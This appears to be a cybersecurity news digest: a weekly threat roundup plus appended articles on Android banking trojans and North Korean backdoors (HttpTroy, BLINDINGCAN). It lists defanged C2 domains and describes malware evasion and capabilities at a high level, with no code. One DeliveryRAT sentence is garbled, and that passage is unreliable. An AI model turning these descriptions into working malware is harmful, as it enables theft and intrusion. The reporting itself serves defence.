This week’s list includes — CVE-2025-55315 (QNAP NetBak PC Agent), CVE-2025-10680 (OpenVPN), CVE-2025-55752, CVE-2025-55754 (Apache Tomcat), CVE-2025-52665 (Ubiquiti UniFi Access), CVE-2025-12044, CVE-2025-11621 (HashiCorp Vault), CVE-2025-43995 (Dell Storage Manager), CVE-2025-5842 (Veeder-Root TLS4B Automatic Tank Gauge System), CVE-2025-24893 (XWiki), CVE-2025-62725 (Docker Compose), CVE-2025-12080 (Google Messages for Wear OS), CVE-2025-12450 (LiteSpeed Cache plugin), CVE-2025-11705 (Anti-Malware Security and Brute-Force Firewall plugin), CVE-2025-55680 (Microsoft Cloud Files Minifilter driver), CVE-2025-6325, CVE-2025-6327 (King Addons for Elementor plugin), CVE-2025-49401 (Quiz and Survey Master plugin), CVE-2025-54603 (Claroty Secure Remote Access), and CVE-2025-10932 (Progress MOVEit Transfer).

📰 Around the Cyber World

• Canada Warns of Hacktivist Attacks Targeting Critical Infra — The Canadian Centre for Cyber Security has issued an alert warning of attacks mounted by hacktivists targeting internet-exposed industrial control systems (ICS). “One incident affected a water facility, tampering with water pressure values and resulting in degraded service for its community,” the Cyber Centre said. “Another involved a Canadian oil and gas company, where an Automated Tank Gauge (ATG) was manipulated, triggering false alarms. A third one involved a grain drying silo on a Canadian farm, where temperature and humidity levels were manipulated, resulting in potentially unsafe conditions if not caught on time.” Organizations are being recommended to ensure all services are properly inventoried, documented, and protected.
• Kinsing Exploits Apache ActiveMQ Flaw — The threat actor known as Kinsing is exploiting CVE-2023-46604, a known flaw in Apache ActiveMQ, to conduct cryptojacking attacks on both Linux and Windows systems. The latest set of attacks, observed by AhnLab, is notable for the deployment of a .NET backdoor called Sharpire, along with XMRig and Stager. “Sharpire is a .NET backdoor that supports PowerShell Empire,” the South Korean cybersecurity company said. “During the process of taking control of the infected system, the threat actor uses CobaltStrike, Meterpreter, and PowerShell Empire together.” It’s worth noting that Kinsing was spotted exploiting the same flaw following its public disclosure in 2023.
• 2 Flaws in 8 Confidential Computing Systems — Two security flaws (CVE-2025-59054 and CVE-2025-58356) have been disclosed in eight different confidential computing systems (Oasis Protocol, Phala Network, Flashbots TDX, Fortanix Salmiac, Edgeless Constellation, Edgeless Contrast, and Cosmian VM) that use Linux Unified Key Setup version 2 (LUKS2) for disk encryption. A partial mitigation has been introduced in cryptsetup version 2.8.1. “Using these vulnerabilities, a malicious actor with access to storage disks can extract all confidential data stored on that disk and can modify the contents of the disk arbitrarily,” Trail of Bits researcher Tjaden Hess said. “The vulnerabilities are caused by malleable metadata headers that allow an attacker to trick a trusted execution environment guest into encrypting secret data with a null cipher.” That said, exploitation of this issue requires write access to encrypted disks. There is no evidence that the vulnerabilities were exploited in the wild.
• Hackers Abuse LinkedIn to Target Finance Executives — Hackers are abusing LinkedIn to target finance executives with direct-message phishing attacks that impersonate executive board invitations with an aim to steal their Microsoft credentials. The messages contain a malicious URL, clicking which triggers a redirect chain that leads victims to a fake landing page instructing them to sign in with their Microsoft account credentials to view a document. The phishing page also implements bot protection like Cloudflare Turnstile to block automated scanners. “Sending phishing lures via social media apps like LinkedIn is a great way to reach employees in a place that they expect to be contacted by people outside of their organization,” Push Security said. “By evading the traditional phishing control point altogether (email) attackers significantly reduce the risk of interception.”
• WhatsApp Adds Support for Passkey-Encrypted Backups — WhatsApp has announced a new way to access encrypted backups with passkey support. “Passkeys will allow you to use your fingerprint, face, or screen lock code to encrypt your chat backups instead of having to memorize a password or a cumbersome 64-digit encryption key,” WhatsApp said. “Now, with just a tap or a glance, the same security that protects your personal chats and calls on WhatsApp is applied to your chat backups so they are always safe, accessible, and private.” The change is expected to be rolled out gradually over the coming weeks and months. Passkeys are a passwordless authentication method based on the FIDO industry standard. They are designed to replace passwords with cryptographic keys stored on the user’s device and secured by biometric or device-lock methods. WhatsApp launched support for passkeys on Android in October 2023 and for iOS in April 2024.
• 12 Malicious VS Code Extensions Flagged — Cybersecurity researchers have flagged a set of 12 malicious components in the Visual Studio Code (VS Code) extension marketplace that come with capabilities to steal sensitive information or plant a backdoor that establishes a persistent connection with an attacker-controlled server address and executes arbitrary code on the user’s host. “Malware in IDE plugins is a supply chain attack channel that enterprise security teams need to take seriously,” HelixGuard said. The development comes as Aikido reported that the threat actors behind the GlassWorm campaign targeting the VS Code extension marketplace and Open VSX have moved to GitHub, employing the same Unicode steganography trick to hide their malicious payloads within JavaScript projects. The supply chain security company said the use of hidden malicious code injected with invisible Unicode Private Use Area (PUA) characters was first observed in a set of malicious npm packages back in March 2025. “These incidents highlight the need for better awareness around Unicode misuse, especially the dangers of invisible Private Use Area characters,” security researcher Ilyas Makari said. “Developers can only defend against what they can see, and right now, most tools are not showing them enough. Neither GitHub’s web interface nor VS Code displayed any sign that something was wrong.”
• Proton Releases Data Breach Observatory — Swiss privacy-focused company Proton has released Data Breach Observatory as a way to scan the dark web for leaks of sensitive data from enterprises. It said over 306.1 million records have been leaked from 794 breaches, with retail, technology, and media emerging as the most targeted sectors. “Small- and medium-sized businesses (companies with 1–249 employees) accounted for 70.5% of the breaches reported,” the company said. “Larger companies (250–999 employees) accounted for 13.5% of data breaches, and enterprise organizations of more than 1,000+ employees accounted for the remaining 15.9%. SMBs are perfect targets for hackers, because while they might offer a smaller payday than an enterprise organization, they’re much easier to breach because they have fewer security protections in place.”
• Russia Arrests 3 in Connection with Meduza infostealer — Russian authorities arrested three individuals who are believed to have created and sold the Meduza infostealer. The suspects were arrested last week in the Moscow metropolitan area, according to Russia’s Interior Ministry. Authorities said they seized computer equipment, phones, and bank cards during raids on the suspects’ homes. The Ministry’s spokesperson, Irina Volk, said the malware was used in attacks against at least one government network in the Astrakhan region. In a report published last September, Russian security firm BI.ZONE said Meduza was used in multiple attacks targeting Russian organizations last year.
• Ukrainian National Extradited to U.S. for Conti Attacks — A Ukrainian national believed to be a member of the Conti ransomware operation has been extradited to the U.S. “From in or around 2020 and continuing until about June 2022, Oleksii Oleksiyovych Lytvynenko, 43, of Cork, Ireland, conspired with others to deploy Conti ransomware to extort victims and steal their data,” the U.S. Justice Department said. “Lytvynenko controlled data stolen from numerous Conti victims and was involved in the ransom notes deployed on the victims’ systems.” Lytvynenko was arrested by Irish authorities in July 2023. He is charged with computer fraud conspiracy and wire fraud conspiracy. If convicted, he faces a maximum penalty of 5 years in prison for the computer fraud conspiracy and 20 years in prison for the wire fraud conspiracy. According to estimates, Conti was used to attack more than 1,000 victims worldwide, resulting in at least $150 million in ransom payments as of January 2022. While the group shut down the “Conti” brand in 2022, its members have split into smaller crews and moved to other ransomware or extortion operations. Four of Lytvynenko’s alleged co-conspirators, Maksim Galochkin, Maksim Rudenskiy, Mikhail Mikhailovich Tsarev and Andrey Yuryevich Zhuykov, were indicted in 2023.
• FCC to Eliminate Cybersecurity Requirements for U.S. Telcos — The U.S. Federal Communications Commission (FCC) said it will vote next month to eliminate new cybersecurity requirements for telecommunication providers. “Following extensive FCC engagement with carriers, the item announces the substantial steps that providers have taken to strengthen their cybersecurity defenses,” Brendan Carr, chairman of the FCC, said.
• Denmark Backs Off from E.U. Chat Control — The Danish government has formally withdrawn its Chat Control legislation after the controversial proposal failed to garner majority support among E.U. bloc members. The German government, on October 8, announced it would not support the plan. While Chat Control was presented as a way to combat the threat arising from Child Sexual Abuse Material (CSAM), critics of the proposal said it would mandate scanning of all private digital communications, including encrypted messages and photos, threatening privacy and security for all citizens in the region.
• Poland Arrests 11 for Running Investment Scam — Polish authorities have arrested 11 suspects who ran an investment scam scheme that relied on call centers located overseas to trick Polish citizens into investing their money in bogus investment websites. The gang allegedly made more than $20 million from at least 1,500 victims.
• 4 New RATs Use Discord for C2 — Cybersecurity researchers have shed light on four new remote access trojans (RATs) that utilize the Discord platform for command-and-control (C2). This includes UwUdisRAT, STD RAT, Minecraft RAT, and Propionanilide RAT. “Minecraft RAT […] is operated by a threat actor group who call themselves ‘STD Group,’” ReversingLabs said. “They also operate a series of very closely related RATs that use Discord as their C2 mechanism. The RATs are so closely related that they may be the same code base, just rebranded.” Propionanilide RAT, on the other hand, features a packer called Proplock or STD Crypter to decrypt and launch the Discord RAT functionality.
• Security Weaknesses in Tata Motors Sites — A number of security issues have been uncovered in Tata Motors’ sites like E-Dukaan, FleetEdge, and cvtestdrive.tatamotors[.]com, including exposed Azuga API keys, two AWS keys, and an embedded “backdoor” account that granted unauthorized access to over 70 TB of sensitive information and infrastructure across hundreds of buckets, compromise its test drive fleet management system, gain admin access to a Tableau account managed by the conglomerate. Following responsible disclosure by security researcher Eaton Zveare in August 2023 in coordination with India’s Computer Emergency Response Team (CERT-In), the issues were eventually addressed by early January 2024. In recent months, Zveare has also demonstrated methods to break into Intel’s internal websites and identified flaws in an unnamed automaker’s centralized dealer platform that could have been abused to gain complete control over the systems of more than 1,000 car dealerships in the U.S. by creating a national admin account. The researcher also identified an API-level security defect in an unspecified platform that granted the ability to access commands to start and stop power generators. While the problem was rectified in October 2023, the platform is no longer active.
• Tangerine Turkey Uses Batch and Visual Basic Scripts to Drop Crypto Miners — A cryptocurrency mining campaign dubbed Tangerine Turkey has been found leveraging batch files and Visual Basic Scripts to gain persistence, evade defenses, and deploy XMRig miners across victim environments. Since its emergence in late 2024, the campaign is assessed to have expanded in scope, targeting organizations indiscriminately across multiple industries and geographies. “Initial access in the Tangerine Turkey malware campaign is achieved through an infected USB device,” Cybereason said. “The attack begins when the wscript.exe executes a malicious VB Script located on the removable drive. By leveraging living‑off-the‑land binaries such as wscript.exe and printui.exe, as well as registry modifications and decoy directories, the malware is able to evade traditional defenses and maintain persistence.”
  
• Hezi Rash Targets Global Sites in Hacktivist Campaign — A new ideologically-motivated threat actor known as Hezi Rash (meaning Black Force) has been linked to approximately 350 distributed denial-of-service (DDoS) attacks targeting countries perceived as hostile to Kurdish or Muslim communities between August and October 2025. Founded in 2023, the Kurdish nationalist hacktivist group has described itself as a digital collective defending Kurdish society against cyber threats, per Check Point, while pushing a mix of nationalism, religion, and activism in its messaging. It’s believed that the threat actor is using tools and services from more established threat actors such as EliteStress, a DDoS-as-a-service (DaaS) platform linked to Keymous+, KillNet, and Project DDoSia and Abyssal DDoS v3. “While the technical impact of these attacks, such as temporary website outages, is evident, the broader business consequences remain unclear,” Check Point said. “The attacks appear to be of the ‘usual variety,’ focusing on disruption rather than sophisticated exploitation.” The disclosure follows a report from Radware, highlighting a surge in claimed DDoS activity between October 6 and October 8, 2025, by hacktivist groups targeting Israel. Some of the key participating groups include Sylhet Gang, Keymous+, Arabian Ghosts, and NoName057(16). “On October 7 alone, more than 50 cyberattack claims against Israeli targets were recorded,” Radware said. “The weekly average number of attacks claimed spiked to almost three times the average compared to the weeks preceding October 7. This sharp escalation underscores how hacktivist campaigns continue to use symbolic anniversaries to amplify their visibility and coordinate global action.”
• Phishing Campaigns Distribute Lampion Stealer — A Brazilian threat group has been spotted employing bank transfer receipt lures containing ZIP files to drop the Lampion stealer by means of ClickFix-style pages present within HTML pages present in the archive. The banking trojan has been active since at least 2019. “The first change was around mid September 2024, where the TAs started using ZIP attachments instead of links to a ZIP; the second change was around mid December 2024 with the introduction of ClickFix lures as a new social engineering technique; the last change was at the end of June 2025, where persistence capabilities were added to the first stage,” Bitsight said. The command executed following ClickFix paves the way for three different VB Scripts that ultimately deploy the DLL stealer component of the malware.
  
• MITRE Releases ATT&CK v18 — The MITRE Corporation has released an updated version of the ATT&CK (v18) framework, which updates detections with two new objects: Detection Strategies for detecting specific attacker techniques and Analytics that provide platform-specific threat detection logic. “On the Mobile front, there’s coverage of state-sponsored abuse of Signal/WhatsApp-linked devices and enhanced account collection techniques,” MITRE said. “And in ICS, new and updated Asset objects expand the range of industrial equipment and attack scenarios ATT&CK can represent, including improved connections across sector-specific terminology through Related Assets.”

🎥 Cybersecurity Webinars

• Stop Drowning in Vulnerability Lists: Discover Dynamic Attack Surface Reduction — Tired of too many security problems and not enough time to fix them? Join The Hacker News and Bitdefender to learn about Dynamic Attack Surface Reduction (DASR)—a new way to quickly close security gaps using smart tools and automation. See how Bitdefender PHASR helps teams stay safe, reduce risk, and block threats before they cause harm.
• Securing Cloud Infrastructure: Strategies to Balance Agility, Compliance, and Security — As more companies move to the cloud, keeping data and access safe becomes harder. In this webinar, experts will share easy-to-follow tips to protect cloud systems, manage user access, and stay on top of global rules—all without slowing down your business. You’ll learn real steps you can take right away to keep your cloud secure and your team moving fast.

🔧 Cybersecurity Tools

• runZeroHound — A new handy open‑source toolkit from runZero that turns your asset data into visual “attack graphs” so you can see exactly how threats could move through your network. With this in hand, you’ll spot dangerous paths, close the gaps faster, and stay ahead of what attackers might try next.
• DroidRun — It is a security testing tool that helps researchers and analysts safely run and monitor Android malware in a sandboxed environment. It’s designed to make it easier to observe how malicious apps behave without risking your system. Perfect for dynamic analysis, it supports automation and gives detailed insights into malware activity.

Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.

🔒 Tip of the Week

Why Attack Surface Reduction Matters More Than Ever — What if your biggest risk isn’t a new zero-day—but something already sitting quietly inside your system?

This week, the spotlight turns to Attack Surface Reduction (ASR)—a strategy that’s fast becoming a must-have, not a nice-to-have. As companies spin up more cloud apps, APIs, and accounts, hackers are finding easy ways in through what’s already exposed. Think forgotten subdomains, unused ports, old user accounts. The more you have, the more they have to work with.

The good news? Open-source tools are stepping up. EasyEASM helps map what’s live on the web. Microsoft’s Attack Surface Analyzer shows what changes after updates or installs. ASRGEN lets you test smart rules in Windows Defender to shut down risky behaviors before they’re exploited.

Here’s the truth: you don’t have to stop building fast—you just have to build smart. Shrinking your attack surface doesn’t slow innovation. It protects it.

Don’t wait for an alert. Take control before attackers do. Map it. Cut it. Lock it down.

Conclusion

The big lesson this week? Cyber threats don’t always look like threats. They can hide in normal apps, trusted websites, or even job offers. It’s no longer just about stopping viruses—it’s about spotting tricks, acting fast, and thinking ahead. Every click, update, and login matters.

Cybersecurity isn’t a one-time fix. It’s an everyday habit.

Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised devices.

According to CYFIRMA, which analyzed three different samples of BankBot-YNRK, the malware incorporates features to sidestep analysis efforts by first checking its running within a virtualized or emulated environment, and then extracting device details such as the manufacturer and model name to ascertain if it’s being executed on a real device.

BankBot-YNRK also checks if the device is manufactured by Oppo, or is running on ColorOS, a version of the Android operating system that’s used on devices made by the Chinese original equipment manufacturer (OEM).

“The malware also includes logic to identify specific devices,” CYFIRMA said. “It verifies whether the device is a Google Pixel or a Samsung device and checks if its model is included in a predefined list of recognized or supported models. This allows the malware to apply device-specific functionality or optimizations only on targeted devices while avoiding execution on unrecognized models.”

The names of the APK packages distributing the malware are listed below. All three apps go by the name “IdentitasKependudukanDigital.apk,” which likely appears to be an attempt to impersonate a legitimate Indonesian government app called “Identitas Kependudukan Digital.”

• com.westpacb4a.payqingynrk1b4a
• com.westpacf78.payqingynrk1f78
• com.westpac91a.payqingynrk191a

Once installed, the malicious apps are designed to harvest device information and set the volume of various audio streams, such as music, ringtone, and notifications, to zero to prevent the affected victim from being alerted to incoming calls, messages, and other in-app notifications.

It also establishes communication with a remote server (“ping.ynrkone[.]top”), and upon receiving the “OPEN_ACCESSIBILITY” command, it urges the user to enable accessibility services so as to realize its goals, including gaining elevated privileges and performing malicious actions.

The disclosure comes as F6 revealed that threat actors are distributing an updated version of DeliveryRAT targeting Russian Android device owners under the guise of food delivery services, marketplaces, banking services, as well as parcel tracking applications. The mobile threat is assessed to be active since mid-2024.

According to the Russian cybersecurity company, the malware is advertised under a malware-as-a-service (MaaS) model through a Telegram bot named Bonvi Team, allowing users to either get access to an APK file or links to phishing pages distributing the malware.

Victims are then approached on messaging apps like Telegram, where they are asked to download the malicious app as part of tracking orders from fake marketplaces or for a remote employment opportunity. Regardless of the method used, the app requests access to notifications and battery optimization settings so that it can gather sensitive data and run in the background without being terminated.

Furthermore, the rogue apps come with capabilities to access SMS messages and call logs, and hide their own icons from the home screen launcher, thereby making it difficult for a less tech-savvy user to remove it from the device.

Some iterations of the DeliveryRAT are also equipped to conduct distributed denial-of-service (DDoS) attacks by making simultaneous requests to the URL link transmitted from the external server and launching activities to capture by making simultaneous requests to the URL link transmitted or by tricking the user into scanning a QR code.

The discovery of the two Android malware families coincides with a report from Zimperium, which discovered more than 760 Android apps since April 2024 that misuse near-field communication (NFC) to illegally obtain payment data and send it to a remote attacker.

These fake apps, masquerading as financial applications, prompt users to set them as their default payment method, while taking advantage of Android’s host-based card emulation (HCE) to steal contactless credit card and payment data.

The information is relayed either to a Telegram channel or a dedicated tapper app operated by the threat actors. The stolen NFC data is then used to withdraw funds from a user’s accounts or make purchases at point-of-sale (PoS) terminals almost instantly.

“Approximately 20 institutions have been impersonated – primarily Russian banks and financial services, but also target organizations in Brazil, Poland, the Czech Republic, and Slovakia,” the mobile security company said.

Nov 03, 2025Ravie LakshmananCybersecurity / Malware

The North Korea-linked threat actor known as Kimsuky has distributed a previously undocumented backdoor codenamed HttpTroy as part of a likely spear-phishing attack targeting a single victim in South Korea.

Gen Digital, which disclosed details of the activity, did not reveal any details on when the incident occurred, but noted that the phishing email contained a ZIP file (“250908_A_HK이노션_SecuwaySSL VPN Manager U100S 100user_견적서.zip”), which masqueraded as a VPN invoice to distribute malware capable of file transfer, capturing screenshots, and executing arbitrary commands.

“The chain has three steps: a small dropper, a loader called MemLoad, and the final backdoor, named ‘HttpTroy,’” security researcher Alexandru-Cristian Bardaș said.

Present within the ZIP archive is a SCR file of the same name, opening which triggered the execution chain, starting with a Golang binary containing three embedded files, including a decoy PDF document that’s displayed to the victim to avoid raising any suspicion.

Also launched simultaneously in the background is MemLoad, which is responsible for setting up persistence on the host by means of a scheduled task named “AhnlabUpdate,” an attempt to impersonate AhnLab, a South Korean cybersecurity company, and decrypt and execute the DLL backdoor (“HttpTroy”).

The implant allows the attackers to gain complete control over the compromised system, enabling file upload/download, screenshot capture, command execution with elevated privileges, in-memory loading of executables, reverse shell, process termination, and trace removal. It communicates with the command-and-control (C2) server (“load.auraria[.]org”) over HTTP POST requests.

“HttpTroy employs multiple layers of obfuscation to hinder analysis and detection,” Bardaș explained. “API calls are concealed using custom hashing techniques, while strings are obfuscated through a combination of XOR operations and SIMD instructions. Notably, the backdoor avoids reusing API hashes and strings. Instead, it dynamically reconstructs them during runtime using varied combinations of arithmetic and logical operations, further complicating static analysis.”

The findings come as the cybersecurity vendor also detailed a Lazarus Group attack that led to the deployment of Comebacker and an upgraded version of its BLINDINGCAN (aka AIRDRY or ZetaNile) remote access trojan. The attack targeted two victims in Canada and was detected in the “middle of the attack chain,” it added.

While the exact initial access vector used in the attack is not known, it’s assessed to be a phishing email based on the absence of any known security vulnerabilities that could have been exploited to gain a foothold.

Two different variants of Comebacker – one as a DLL and another as an EXE – have been put to use, with the former launched via a Windows service and the latter through “cmd.exe.” Irrespective of the method used to execute them, the end goal of the malware is the same: to decrypt an embedded payload (i.e., BLINDINGCAN) and deploy it as a service.

BLINDINGCAN is designed to establish a connection with a remote C2 server (“tronracing[.]com”) and await further instructions that allow it to –

• Upload/download files
• Delete files
• Alter a file’s attributes to mimic another file
• Recursively enumerate all files and sub-directories for a specified path
• Gather data about files across the entire file system
• Collect system metadata
• List running processes
• Run a command-line using CreateProcessW
• Execute binaries directly in memory
• Execute commands using “cmd.exe”
• Terminate a specific process by passing a process ID as input
• Take screenshots
• Take pictures from the available video capture devices
• Update configuration
• Change current working directory
• Delete itself and remove all traces of malicious activity

“Kimsuky and Lazarus continue to sharpen their tools, showing that DPRK-linked actors aren’t just maintaining their arsenals, they’re reinventing them,” Gen Digital said. “These campaigns demonstrate a well-structured and multi-stage infection chain, leveraging obfuscated payloads and stealthy persistence mechanisms.”

“From the initial stages to the final backdoors, each component is designed to evade detection, maintain access and provide extensive control over the compromised system. The use of custom encryption, dynamic API resolution and COM-based task registration/services exploitation highlights the groups’ continued evolution and technical sophistication.”